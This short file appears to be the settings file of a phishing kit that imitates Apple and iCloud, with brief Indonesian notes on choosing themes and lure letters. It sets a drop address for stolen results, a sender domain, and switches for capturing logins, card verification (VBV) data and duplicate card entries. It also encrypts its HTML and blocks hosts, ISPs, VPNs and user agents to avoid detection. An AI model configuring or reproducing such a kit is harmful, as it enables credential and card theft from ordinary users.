email_result = strdarknet@yandex.com
lock_platform = 0
sender_mail = admin@16digit.shop
site_parameter = slebew
site_password = 
site_param_on = 0
site_pass_on = 0
send_login = 1
mix_result = 1
get_photo = 0
get_vbv = 1
get_email = 0
get_bank = 0
double_cc = 1
onetime = 1
encrypt_html = 1
block_host = 1
block_ua = 1
block_iprange = 1
block_isp = 1
block_vpn = 1
theme = apple
letter = invoice


//////////// 
Settingan 
•Setting Themes : icloud / apple / classic
•Setting letter : invoice / verify / locked